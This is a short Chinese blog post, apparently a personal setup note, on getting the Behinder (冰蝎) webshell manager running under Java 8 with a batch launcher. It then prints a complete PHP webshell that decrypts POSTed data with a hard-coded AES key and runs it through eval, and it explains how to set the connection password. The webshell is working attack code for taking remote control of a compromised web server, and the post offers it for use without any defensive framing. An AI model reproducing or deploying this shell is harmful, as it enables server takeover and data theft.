最近尝试使用冰蝎这个工具,期间踩了很多坑,这里记录一下
冰蝎下载地址:https://github.com/rebeyond/Behinder/releases
这里我们选择zip下载,然后解压,
这里出现第一个坑:
大家可能会只装了java16,因为我们的burp抓包工具,需要用java16环境,java8不行
但我们的冰蝎在java16下打不开,java8可以,所以我们在这里也把java8安装一下
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
安装完后,记录好你安装的路径
在冰蝎目录下建议一个文件
Behinder_start.bat
1
2
| cd D:\Java\jdk-se8\bin //java8路径
start javaw -jar D:\tools\Behinder_v3.0_Beta_7\Behinder.jar //冰蝎路径
|
然后我们运作这个bat就能打开冰蝎了
冰蝎不能用普通的一句话木马连接
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| <?php
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
|
如果要修改连接密码则将自己的密码进行md5加密然后取其前16位替换$key的值
连接成功
